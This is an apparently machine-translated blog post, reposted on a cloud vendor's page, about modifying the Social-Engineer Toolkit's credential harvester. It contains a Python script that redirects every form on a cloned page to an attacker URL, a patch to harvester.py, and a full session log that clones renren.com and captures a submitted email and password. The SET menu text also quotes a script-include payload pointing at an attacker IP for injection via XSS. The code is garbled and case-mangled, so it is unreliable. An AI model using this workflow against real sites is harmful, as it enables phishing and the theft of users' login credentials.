Script Modifications for credential harvester

Source: Internet
Author: User
Tags generator

Yesterday the test appeared garbled. This evening debugging, modified a bit.

#!/usr/bin/python # Filename:ModifyFormAction.py Import sys import OS from pyquery import pyquery as PQ def Modifyforma
    ction (Htmlpath, URL): If not Os.path.isfile (htmlpath): print '%s is not a file '% Htmlpath return D = PQ (Filename=htmlpath, parser= ' html ') node = d (' meta[http-equiv= ' content-type '] ') ContentType = node.attr ("http -equiv ") content = node.attr (" content ") meta = ' <meta http-equiv= '%s ' content= '%s '/> '% (ContentType, conte NT) forms = d (' form ') for I in range (0, Len (forms)): Forms.eq (i). attr ("action", URL) submits
        = d (' input[type= "submit"] "for I in range (0, Len (submits)): onclick =" document.forms[%d].submit (); "% i Submits.eq (i). attr ("onclick", onclick) HTML = d.outerhtml (). Encode (' utf-8 ') Htmlarr = Html.split ("&LT;HEAD&G
    t; ")
    newhtml = htmlarr[0] + " 

Also modify the harvester.py, where it is modified to:

                Fileopen=file ("Src/program_junk/site.template", "R"). ReadLines () for line in
                FileOpen:
                        Line=line.rstrip ()
                        match=re.search ("url=", line)
                        if match:
                                raw_url=line.replace ("Url=", "")
                                url=line.replace ("url= http://"," ")
                                url=line.replace (" url=https://"," ")
                                counter=1
                                break
                        if counter== 0:url= '

There is no break in the original. In this way, there is no garbled, you can return to the original page, but there is a problem, is not to login operation. It's too late today to change it later.


root@bt:/pentest/exploits/set#./set. ######.. ########.########
                   .##....##.##..........##...
                   . ##.......##..........##...
                   .. ######.. ######......##...
                   .......##.##..........##...
                   . ##....##.##..........##...
                   .. ######..  

  ########....##...        [---] The Social-engineer Toolkit (SET) [---] [---] Created by:david Kennedy (rel1k) [---] [ 
  ---] Development team:jr depre (PR1ME) [---] [---] Development team:joey furr (j0fer) [---]        [---]                  Development team:thomas Werth [---] [---] Development team:garland [---] [---]         version:3.6 [---] [---] codename: ' Mmmmhhhhmmmmmmmmm ' [---] [---]      bugs:davek@trustedsec.com [---] [---] Follow me on twitter:dave_rel1k   [---]       [---] homepage:https://www.trustedsec.com [---] Welcome to the Social-engineer Toolkit (SET).
    
    Your One stop shop for all of Your social-engineering needs ...

           Join us on irc.freenode.net in channel #setoolkit the Social-engineer Toolkit is a product of trustedsec. Visit:https://www.trustedsec.com Select from the menu:1) social-engineering attacks 2) Fast-track penetration T Esting 3) Third party Modules 4) update the Metasploit Framework 5) Update the Social-engineer Toolkit 6) UPDA


                                               
                    Te SET configuration 7) Help, credits, and about) Exit the Social-engineer Toolkit set> 1
                     :::===  :::===== :::====
                    :::     :::      :::==== =====  ======     ===  
                        === ===        ===  
                    ======  ===== = = = = = = = = = = = = [---] the social-engineer Toolkit (SET) [---] [---] Created by:david Kennedy (rel1k) [---] [---] Development team:jr depre (PR1 ME) [---] [---] Development team:joey furr (j0fer) [---] [---] Development team:thomas We                    Rth [---] [---] Development team:garland [---] [---] version:3.6
  [---]          [---]         Codename: ' Mmmmhhhhmmmmmmmmm ' [---] [---] bugs:davek@trustedsec.com [---] [---] Follow me on twitter:dave_rel1k [---] [---] homepage:https://www.trustedsec.com [---] welco Me to the Social-engineer Toolkit (SET).
    
    Your One stop shop for all of Your social-engineering needs ...

           Join us on irc.freenode.net in channel #setoolkit the Social-engineer Toolkit is a product of trustedsec. Visit:https://www.trustedsec.com Select from the menu:1) spear-phishing Attack Vectors 2) Website atTack Vectors 3) infectious Media generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-b ased Attack Vector 7) SMS spoofing Attack vector 8) Wireless Access point Attack Vector 9) QRCode Generator Attac

K Vector) Powershell Attack Vectors) Third party Modules () return to the main menu. Set> 2 The Web Attack module is a unique way of utilizing multiple web-based attacks into order to compromise the INT

 Ended victim. The Java Applet Attack method would spoof a Java certificate and deliver a Metasploit based.

 Uses A customized Java applet created by Thomas Werth to deliver the payload. The Metasploit Browser exploit method would utilize select Metasploit Browser exploits through an IFRAME and deliver a Met

 Asploit payload. The credential Harvester method would utilize web cloning of a web-site that has a username and password field and harves

 T all the information posted to the website. The tabnabbing metHod would wait for a user to move to a different tab and then refresh the page to something different. The man left in the middle Attack method is introduced by Kos and utilizes HTTP REFERER ' s in order to intercept fields and harvest data from them. You are need to have a already vulnerable site and in-corporate <script src= "http://YOURIP/".

 This could either is from a compromised site or through XSS. The Web-jacking Attack method is introduced by White_sheep, Emgent and the back| Track team. This method utilizes an IFRAME replacements to make the highlighted URL link to appear legitimate however when clicked a Window pops up then are replaced with the malicious link.

 You can edit the link replacement settings in the Set_config if it too slow/fast. The Multi-attack method would add a combination of attacks through the Web Attack menu.  For example can utilize the Java applet, Metasploit Browser, credential harvester/tabnabbing, and the mans left in the Middle AttaCK all in once to-which is successful. 1 Java Applet Attack Method 2) Metasploit Browser exploit method 3) Credential Harvester Attack Method 4) Tabnab Bing Attack method 5) Mans left into the middle Attack Method 6) Web jacking Attack Method 7) Multi-attack Web Metho D 8) victim Web Profiler 9) Create or import a CodeSigning certificate) return to Main Menu set:webattack> 3 The Allow SET to import a list of pre-defined Web applications that it can utilize within the Atta

 Ck.  The second method would completely clone a website of your choosing and allow to utilize the attack vectors the

 Completely same Web application you were attempting to clone. The third method allows your to import your own website, which is should only have a index.html when using the Impor
   
   T website functionality. 1 Web Templates 2) Site Cloner 3 Custom Import) return to WebAttack Menu set:webattack>2 [-] credEntial Harvester would allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from
A website as ok as place them into a [-] This option is used for what IP the server'll POST to. [-] If you ' re using a external IP, use your external IP as this set:webattack> IP addresses for the POST back in harvester/ tabnabbing:192.168.1.11 [-] SET supports both HTTP and HTTPS [-] example:http://www.thisisafakesite.com Set:webattack&gt ;
Enter the URL to clone:www.renren.com [*] Cloning the website:http://www.renren.com [*] This could take a little bit ... Modified successfully the best way to use this attack is if username and password form fields are.
Regardless, this captures all POSTs on a website. [!]

      I have read the above message. Press <return> to continue [*] Social-engineer Toolkit credential harvester Attack [*] Credential harvester is Runn ing on port [*] information is displayed to as it arrives below: 192.168.1.142--[28/apr/2013 05:23:20] "get/http/1.1"-[*] WE GOT A hit! Printing the output:possible USERNAME field found:email=yangyang@gmail.com POSSIBLE PASSWORD field Found:password=yang_ Pass param:icode= param:origurl=http://www.renren.com/home param:domain=renren.com param:key_id=1 POSSIBLE USERNAME F
 Ield Found:captcha_type=web_login [*] When you are ' RE finished, HIT control-c to GENERATE A.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.